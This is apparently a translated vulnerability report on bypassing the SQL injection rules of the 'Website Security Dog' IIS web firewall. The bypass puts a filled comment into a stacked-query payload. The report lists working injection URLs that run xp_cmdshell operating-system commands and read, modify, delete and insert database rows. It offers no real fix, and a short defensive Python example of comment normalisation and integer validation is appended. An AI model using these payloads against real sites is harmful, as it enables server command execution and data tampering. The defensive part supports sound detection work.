Attackers can execute arbitrary SQL statements by bypassing the protection rules of the latest Website Security Dog (IIS edition).
Detailed description:
Many websites still contain SQL injection flaws, and nothing in their own code intercepts the injection.
We construct an SQL injection request. In this case, Security Dog intercepts the injection.
/Default.aspx?Id=481942;DECLARE/**/@s VARCHAR(2000);SET @s='xp_cmdshell ''dir'';EXEC(@s)
Now is the time to witness the miracle! Add any characters inside the /**/ comment, such as /* 1...
/Default.aspx?Id=481942;DECLARE/* 1 */@s VARCHAR(2000);SET @s='xp_cmdshell ''' dir'';EXEC(@s)
With the rule bypassed this way, content can be added, deleted, queried, and modified.
-- Execute Command
/Default.aspx?Id=481942;DECLARE/* 1 */@s VARCHAR(2000);SET @s='xp_cmdshell ''' dir'';EXEC(@s)
-- Query
/Default.aspx?Id=481942;DECLARE/* 2 */@s VARCHAR(2000);SET @s=replace('select * fxxxm Online_tj','xxx','ro');EXEC(@s)--
-- Modify
/Default.aspx?Id=481942;DECLARE/* 2 */@s VARCHAR(2000);SET @s='Update Online_tj xxxt logtime = 1 where id = 1';EXEC(@s)--
-- Delete
/Default.aspx?Id=481942;DECLARE/* 2 */@s VARCHAR(2000);SET @s=replace('delete Online_tj where id = 1','xxx','se');EXEC(@s)--
-- Add
/Default.aspx?Id=481942;DECLARE/* 2 */@s VARCHAR(2000);SET @s='insert Online_tj values ('000000') ';EXEC(@s)--
Proof of vulnerability:
Solution:
You are more professional than me!
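The /**/ versus /* 1 */ difference described above suggests a rule that matches one literal comment form instead of normalising comments first. The following is an added example, not part of the original report and not the product's actual rule logic: NAIVE_RULE is a hypothetical signature, the sample values are constructed with a placeholder SQL body, and the function names are illustrative. It compares that signature with a check that neutralises every block comment before matching, and with the application-side fix of accepting only an integer Id.

```python
import re
from urllib.parse import unquote_plus

# Hypothetical brittle signature: accepts only whitespace or the literal
# empty comment /**/ as the separator after DECLARE.
NAIVE_RULE = re.compile(r"declare(?:\s|/\*\*/)+@\w+", re.IGNORECASE)

BLOCK_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
BATCH_KEYWORDS = re.compile(r";\s*(?:declare|set|exec(?:ute)?)\b")


def normalise(value: str) -> str:
    """URL-decode, turn every block comment into one space, lowercase."""
    text = BLOCK_COMMENT.sub(" ", unquote_plus(value))
    return re.sub(r"\s+", " ", text).strip().lower()


def naive_rule_blocks(value: str) -> bool:
    """Signature applied to the decoded value with comments left in place."""
    return bool(NAIVE_RULE.search(unquote_plus(value)))


def normalised_rule_blocks(value: str) -> bool:
    """Match stacked-statement keywords after comments are neutralised."""
    return bool(BATCH_KEYWORDS.search(normalise(value)))


def valid_id(value: str) -> bool:
    """Application-side check: Id must be a short decimal integer."""
    return re.fullmatch(r"[0-9]{1,10}", value) is not None


# Constructed samples modelled on the Id parameter above; SQL body is a placeholder.
SAMPLES = {
    "benign": "481942",
    "empty_comment": "481942;DECLARE/**/@s VARCHAR(2000);SET @s='<statement>';EXEC(@s)",
    "filled_comment": "481942;DECLARE/* 1 */@s VARCHAR(2000);SET @s='<statement>';EXEC(@s)",
}

if __name__ == "__main__":
    for name, value in SAMPLES.items():
        print(f"{name:15} naive={naive_rule_blocks(value)!s:5} "
              f"normalised={normalised_rule_blocks(value)!s:5} "
              f"valid_id={valid_id(value)}")
```

The integer check in valid_id rejects both injected samples without any signature, which is why validating or parameterising the Id in the application code is the durable fix and the filter is only a second layer.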